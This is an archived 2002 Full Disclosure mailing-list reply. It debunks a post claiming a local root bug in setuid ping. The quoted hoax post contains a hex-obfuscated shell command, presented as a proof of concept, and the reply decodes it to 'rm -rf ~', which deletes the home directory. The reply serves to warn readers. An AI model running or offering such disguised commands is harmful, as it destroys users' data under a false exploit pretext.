Full Disclosure mailing list archives

ATTENTION Local Root ATTENTION

From: gbroiles () parrhesia com (Greg Broiles)
Date: Sun, 15 Sep 2002 06:56:44 -0700

At 06:40 AM 9/15/2002 -0700, drdre () hush com wrote:

DrDre researchers have rcently discovered a bug in the ping program which 
is installed setuid-root in nearly all unix and unix like systems. The bug 
is not remotely exploitable.

Tested on FreeBSD 4.4:

bash# id
uid=1006(drdre) gid=1006(researchers) groups=1006(researchers), 1009(labstaff)

bash# ping `perl -e 'print 
"\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo 
 -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
Unknown erver error   ^


Ahh, bullshit.

echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e" decodes to "rm -rf ~".

The bug you illustrate is related to people who run obscured code from 
untrusted sources without
inspecting it first.


--
Greg Broiles -- gbroiles () parrhesia com -- PGP 0x26E4488c or 0x94245961

Current thread:

ATTENTION Local Root ATTENTION drdre () hush com (Sep 15)
- ATTENTION Local Root ATTENTION Greg Broiles (Sep 15)
- ATTENTION Local Root ATTENTION Nexus (Sep 15)